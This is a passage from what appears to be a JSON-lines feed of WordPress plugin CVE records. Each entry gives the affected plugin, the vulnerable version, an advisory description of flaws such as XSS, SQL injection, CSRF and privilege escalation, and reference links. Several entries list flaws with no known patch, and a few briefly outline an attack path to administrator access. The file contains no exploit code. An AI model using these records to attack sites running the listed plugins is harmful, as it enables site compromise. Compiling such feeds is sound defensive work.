4d95-90cb-9731b398a009?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5733","slug":"modern-events-calendar-lite","versionImpact":"7.21.9","description":"The Modern Events Calendar Lite plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 7.21.9. This is due improper or insufficient validation of the id property when exporting calendars. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","refs":"[{\"url\":\"https:\\\/\\\/webnus.net\\\/dox\\\/modern-events-calendar\\\/\",\"name\":\"https:\\\/\\\/webnus.net\\\/dox\\\/modern-events-calendar\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modern-events-calendar-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modern-events-calendar-lite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e545b53e-7054-41dc-b69b-7552ef6c3240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e545b53e-7054-41dc-b69b-7552ef6c3240?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1426","slug":"wp-tiles","versionImpact":"1.1.2","description":"The WP Tiles WordPress plugin through 1.1.2 does not ensure that posts to be displayed are not draft\/private, allowing any authenticated users, such as subscriber to retrieve the titles of draft and privates posts for example. AN attacker could also retrieve the title of any other type of post.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdd79bb4-d434-4635-bb2b-84d079ecc746\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdd79bb4-d434-4635-bb2b-84d079ecc746\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4946","slug":"accesspress-anonymous-post","versionImpact":"2.8.4","description":"The Frontend Post WordPress Plugin WordPress plugin through 2.8.4 does not validate an attribute of one of its shortcode, which could allow users with a role as low as contributor to add a malicious shortcode to a page\/post, which will redirect users to an arbitrary domain.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e222018-a3e0-4af0-846c-6f00b67dfbc0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e222018-a3e0-4af0-846c-6f00b67dfbc0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2271","slug":"tiempocom","versionImpact":"0.1.2","description":"The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31512f33-c310-4b36-b665-19293097cc8b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31512f33-c310-4b36-b665-19293097cc8b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0378","slug":"ai-engine","versionImpact":"2.2.0","description":"The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI chat data when discussion tracking is enabled in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54344300-6288-40bc-b539-3dc9b555ed00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54344300-6288-40bc-b539-3dc9b555ed00?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3918","slug":"pet-manager","versionImpact":"1.4","description":"The Pet Manager WordPress plugin through 1.4 does not sanitise and escape some of its Pet settings, which could allow high privilege users such as Contributor to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2074d0f5-4165-4130-9391-37cb21e8aa1b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2074d0f5-4165-4130-9391-37cb21e8aa1b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8761","slug":"share-this-image","versionImpact":"2.03","description":"The Share This Image plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 2.03. This is due to insufficient validation on the redirect url supplied via the link parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e72d5c7-c601-4775-a825-4786bbd1b5f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e72d5c7-c601-4775-a825-4786bbd1b5f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/assets\\\/js\\\/sti.js#L693\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/assets\\\/js\\\/sti.js#L693\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/includes\\\/class-sti-shortlink.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/includes\\\/class-sti-shortlink.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/includes\\\/class-sti-shortlink.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/includes\\\/class-sti-shortlink.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152564\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152564\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10592","slug":"mapster-wp-maps","versionImpact":"1.6.0","description":"The Mapster WP Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the popup class parameter in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f1c13f6-150c-4634-a4d8-176a4d7a2296?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f1c13f6-150c-4634-a4d8-176a4d7a2296?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapster-wp-maps\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapster-wp-maps\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11777","slug":"sell-media","versionImpact":"2.5.8.5","description":"The Sell Media plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sell_media_search_form_gutenberg' shortcode in all versions up to, and including, 2.5.8.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sell-media\\\/trunk\\\/\\\/gutenberg\\\/blocks\\\/sell-media-search-form\\\/sell-media-search-form.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sell-media\\\/trunk\\\/\\\/gutenberg\\\/blocks\\\/sell-media-search-form\\\/sell-media-search-form.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sell-media\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sell-media\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a35f0bb-691f-4acf-a30d-4ddabe3b919c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a35f0bb-691f-4acf-a30d-4ddabe3b919c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13388","slug":"tcbd-tooltip","versionImpact":"1.0","description":"The TCBD Tooltip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbdtooltip_text' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tcbd-tooltip\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tcbd-tooltip\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43ca15b7-8cb4-427f-892d-15022da17b2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43ca15b7-8cb4-427f-892d-15022da17b2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5701","slug":"hypercomments","versionImpact":"1.2.2","description":"The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hypercomments\\\/trunk\\\/hypercomments.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hypercomments\\\/trunk\\\/hypercomments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07fd6bee-5b00-4fc1-9f7a-3857fd35c763?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07fd6bee-5b00-4fc1-9f7a-3857fd35c763?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4941","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.1.3.3. This is due to a missing capability check on the woobe_bulkoperations_swap function. This makes it possible for authenticated attackers (subscriber or higher) to manipulate products.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L521\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L521\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc20f303-cac3-4517-9c45-153c410a13af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc20f303-cac3-4517-9c45-153c410a13af?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1775","slug":"nextend-facebook-connect","versionImpact":"3.1.12","description":"The Nextend Social Login and Register plugin for WordPress is vulnerable to a self-based Reflected Cross-Site Scripting via the \u2018error_description\u2019 parameter in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers, with access to a subscriber-level account, to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: This vulnerability can be successfully exploited on a vulnerable WordPress instance against an OAuth pre-authenticated higher-level user (e.g., administrator) by leveraging a cross-site request forgery in conjunction with a certain social engineering technique to achieve a critical impact scenario (cross-site scripting to administrator-level account creation). However, successful exploitation requires \"Debug mode\" to be enabled in the plugin's \"Global Settings\".","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bad1d0d-3817-4c7f-a012-5a85b577781e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bad1d0d-3817-4c7f-a012-5a85b577781e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042326\\\/nextend-facebook-connect\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042326\\\/nextend-facebook-connect\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0337","slug":"travelpayouts","versionImpact":"1.1.16","description":"The Travelpayouts: All Travel Brands in One Place WordPress plugin through 1.1.15 is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f17a274-8676-4f4e-989f-436030527890\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f17a274-8676-4f4e-989f-436030527890\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3917","slug":"pet-manager","versionImpact":"1.4","description":"The Pet Manager WordPress plugin through 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88162016-9fc7-4194-9e81-44c50991f6e9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88162016-9fc7-4194-9e81-44c50991f6e9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5576","slug":"tutor-lms-elementor-addons","versionImpact":"2.1.4","description":"The Tutor LMS Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'course_carousel_skin' attribute within the plugin's Course Carousel widget in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fdd1b1c-84b5-451a-a921-80be3b154398?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fdd1b1c-84b5-451a-a921-80be3b154398?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-elementor-addons\\\/tags\\\/2.1.4\\\/templates\\\/course\\\/course-carousel.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-elementor-addons\\\/tags\\\/2.1.4\\\/templates\\\/course\\\/course-carousel.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/#file9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/#file13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/#file13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor-lms-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor-lms-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10645","slug":"blogger-301-redirect","versionImpact":"2.5.3","description":"The Blogger 301 Redirect plugin for WordPress is vulnerable to blind time-based SQL Injection via the \u2018br\u2019 parameter in all versions up to, and including, 2.5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06359274-37ae-47f5-824c-25600c5b06eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06359274-37ae-47f5-824c-25600c5b06eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blogger-301-redirect\\\/trunk\\\/bloggerredirect.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blogger-301-redirect\\\/trunk\\\/bloggerredirect.php#L93\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11437","slug":"timeline-designer","versionImpact":"1.4","description":"The Timeline Designer plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in all versions up to, and including, 1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-designer\\\/trunk\\\/admin\\\/assets\\\/admin-shortcode-list.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-designer\\\/trunk\\\/admin\\\/assets\\\/admin-shortcode-list.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12349179-e61c-42b8-b0ff-5b49fc4906c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12349179-e61c-42b8-b0ff-5b49fc4906c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13379","slug":"c9-admin-dashboard","versionImpact":"1.3.5","description":"The C9 Admin Dashboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-admin-dashboard\\\/trunk\\\/c9-admin.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-admin-dashboard\\\/trunk\\\/c9-admin.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-admin-dashboard\\\/trunk\\\/c9-admin.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-admin-dashboard\\\/trunk\\\/c9-admin.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/c9-admin-dashboard\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/c9-admin-dashboard\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f4af1b-5e3c-4129-93c3-4f368bd2b0db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f4af1b-5e3c-4129-93c3-4f368bd2b0db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5341","slug":"forminator","versionImpact":"1.44.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id' and 'data-size\u2019 parameters in all versions up to, and including, 1.44.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.44.1\\\/assets\\\/forminator-ui\\\/js\\\/forminator-form.js#L985\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.44.1\\\/assets\\\/forminator-ui\\\/js\\\/forminator-form.js#L985\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306475\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306475\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/forminator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/forminator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/415bfddb-5223-439f-8a08-535f79631ff0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/415bfddb-5223-439f-8a08-535f79631ff0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7727","slug":"gutenverse","versionImpact":"3.1.0","description":"The Gutenverse plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Animated Text and Fun Fact blocks in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338801\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338801\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76cfe806-a8d9-4249-b2d0-eb3a314ca69a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76cfe806-a8d9-4249-b2d0-eb3a314ca69a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2482","slug":"responsive-css-editor","versionImpact":"1.0","description":"The Responsive CSS EDITOR WordPress plugin through 1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0f73781-be7e-482e-91de-ad7991ad4bd5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0f73781-be7e-482e-91de-ad7991ad4bd5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2225","slug":"seo-alert","versionImpact":"1.5.9","description":"The SEO ALert WordPress plugin through 1.59 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0af475ba-5c02-4f62-876d-6235a745bbd6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0af475ba-5c02-4f62-876d-6235a745bbd6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4926","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.3.3. This is due to missing or incorrect nonce validation on the woobe_bulk_delete_products function. This makes it possible for unauthenticated attackers to delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulk\\\/bulk.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulk%2Fbulk.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulk\\\/bulk.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulk%2Fbulk.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab633506-63a1-4be1-b402-c7f0bcc4ea7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab633506-63a1-4be1-b402-c7f0bcc4ea7a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulk\\\/bulk.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulk\\\/bulk.php#L159\",\"refsource\":\"MISC\",\"tags\":[]}]"}
